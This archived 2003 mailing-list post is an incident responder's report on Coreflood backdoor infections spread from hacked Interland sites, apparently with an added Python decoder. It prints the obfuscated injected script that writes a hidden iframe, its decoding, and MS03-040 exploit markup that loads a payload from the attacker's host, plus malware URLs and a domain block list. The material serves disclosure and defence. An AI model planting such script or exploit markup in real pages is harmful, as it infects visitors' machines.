Security Incidents mailing list archives

RE: New Trojan


From: "James C. Slora, Jr." <james.slora () phra com>
Date: Thu, 30 Oct 2003 16:19:09 -0500

Rejected by the moderator last time I tried to post on this topic. New
backdoor.coreflood infections today from the same name string. This time
ftp.goling2003.com at IP 66.98.178.33, wvw.goling2003.com at
216.40.230.17 and vvv.goling2003.com at 216.40.230.17.

wvw.goling2003.com was again the source of the infection.

Downloads:
http://vvv.goling2003.com:53/stop.bat
http://vvv.goling2003.com:53/inf.ooo
ftp.goling2003.com/ap216.exe (different type of log - URL may be
incomplete)

I DO think that the "goling" and "chinesenaming" strings are
persistently relevant, and are not mere one-time distractions. 

Block
*.goling.com
*.goling2003.com
*.chinesenaming.com

Not a comprehensive list, but these are the ones I have seen repeatedly.

IP addresses are irrelevant for blocking purposes. They have changed
several times.

There have been at least three mass compromises of Interland sites, and
all three times the Coreflood author has redirected to sites with these
types of names. The code changes, the exploit changes, and the IP
addresses change - but he loves his aliases. They seem to be preferred
signature strings of the author. Failing to find these strings in logs
does not mean you are safe, but finding them gives you a reason to
worry.

Yet again today, a compromised Interland site redirected to the malware
site. It appended the following script to the end of each page on the
compromised site:
<script type="text/javascript">
document.write("\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u0077\u002e\u0067\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u002e\u0063\u006f\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u006d\u006c\u0020\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u0061\u0072\u0067\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u006d\u0061\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e");
</script>

IE is bright enough to run the script even though it comes after the
</HTML> tag.

The Unicode string is just ASCII expressed as Unicode. It converts to
hex:
%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%76%77%2e%67
%6f%6c%69%6e%67%32%30%30%33%2e%63%6f%6d%2f%6d%61%69%6e%2e%68%74%6d%6c%20
%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62
%6f%72%64%65%72%3d%30%20%6d%61%72%67%69%6e%77%69%64%74%68%3d%30%20%6d%61
%72%67%69%6e%68%65%69%67%68%74%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e

Which converts to:
<iframe src=http://wvw.goling2003.com/main.html  width=0 height=0
frameborder=0 marginwidth=0 marginheight=0></iframe>
Just your basic iframe, invoked by a script.

But that page does use an exploit fixed in MS03-040 to force
installation of arbitrary code:
<span 
datasrc="#oa" 
datafld="ea" 
dataformatas="html">
</span> 
<xml id="oa">
<se> 
<ea>
<![CDATA[ 
<object 
data="http://vvv.goling2003.com:53/inf.ooo"; width=0 height=0>
</object> 
]]>
</ea> 
</se> 
</xml>


-----Original Message-----
From: James C. Slora, Jr. 
Sent: Monday, October 27, 2003 4:32 PM
To: 'incidents () securityfocus com'
Subject: RE: New Trojan


John Tran wrote:
Was this trojan discussed in Microsoft Security Bulletins? If so, what number or KB?

Coreflood variants have been installed by visiting 
compromised Web sites using exploits fixed in MS03-040 and 
MS03-032. I'm sure there are many other vectors of infection.

Visits to sites whose names contain the strings 
"chinesenaming" or "goling" are particularly suspect as 
sources of infection. These strings (and maybe others too) 
were used in redirects from hacked Interland sites in 
September and October.

216.247.117.225 was the most recent IP address I've seen 
associated with the hostile sites.
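The decoding walked through above (the \uXXXX escapes and the %XX form) and the hostname blocklist given earlier in the message, as an added Python example that is not part of the original post. It embeds the document.write() string quoted in the post with the mailer's line wrapping removed, decodes it the same way, and flags the zero-size iframe whose host matches one of the block patterns. The function names and the "constructed" sample are mine; the escape string, iframe and block patterns are the ones the post gives.

```python
"""Decode the obfuscated injected script from the post and flag the hidden
iframe it writes. Added example; not code from the original message."""
import fnmatch
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the document.write() argument quoted in the post, with
# the mail wrapping removed so every \uXXXX escape is intact.
INJECTED_SCRIPT = (
    '<script type="text/javascript">document.write("'
    r'\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d'
    r'\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u0077\u002e\u0067'
    r'\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u002e\u0063\u006f'
    r'\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u006d\u006c\u0020'
    r'\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069'
    r'\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u006d\u0065\u0062'
    r'\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u0061\u0072\u0067'
    r'\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u006d\u0061'
    r'\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030'
    r'\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e'
    '");</script>'
)

# Hostname patterns the post says to block, in the wildcard form given there.
BLOCKLIST = ["*.goling.com", "*.goling2003.com", "*.chinesenaming.com"]

_JS_ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})')


def js_unescape(s):
    """Turn JavaScript \\uXXXX and \\xXX escapes into the characters they encode."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_obfuscated(s):
    """Decode both forms shown in the post: JS escapes, then %XX percent-encoding."""
    return unquote(js_unescape(s))


def document_write_payloads(html_src):
    """Return the decoded string argument of every document.write("...") call."""
    pattern = re.compile(r'document\.write\(\s*(["\'])(.*?)\1\s*\)', re.S)
    return [decode_obfuscated(m.group(2)) for m in pattern.finditer(html_src)]


def hidden_iframe_sources(markup):
    """Return src of each iframe whose width and height are both 0 (the hidden ones)."""
    srcs = []
    for tag in re.finditer(r'<iframe\b([^>]*)>', markup, re.I):
        attrs = dict(re.findall(r'(\w+)\s*=\s*["\']?([^\s"\'>]+)', tag.group(1)))
        if attrs.get("width") == "0" and attrs.get("height") == "0" and "src" in attrs:
            srcs.append(attrs["src"])
    return srcs


def matches_blocklist(url):
    """True when the URL's host matches one of the wildcard block patterns."""
    host = urlsplit(url).hostname or ""
    return any(fnmatch.fnmatch(host, pat) for pat in BLOCKLIST)


def analyse(html_src):
    """Decode every document.write() payload and report hidden iframes it creates."""
    findings = []
    for payload in document_write_payloads(html_src):
        for src in hidden_iframe_sources(payload):
            findings.append({"src": src, "blocklisted": matches_blocklist(src)})
    return findings


if __name__ == "__main__":
    for finding in analyse(INJECTED_SCRIPT):
        print(finding)
```

Run over a saved copy of a compromised page, analyse() reports every hidden iframe written by script and whether its host hits the block patterns; a page where the script sits after the closing </HTML> tag is handled the same way, since the scan does not depend on document structure.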


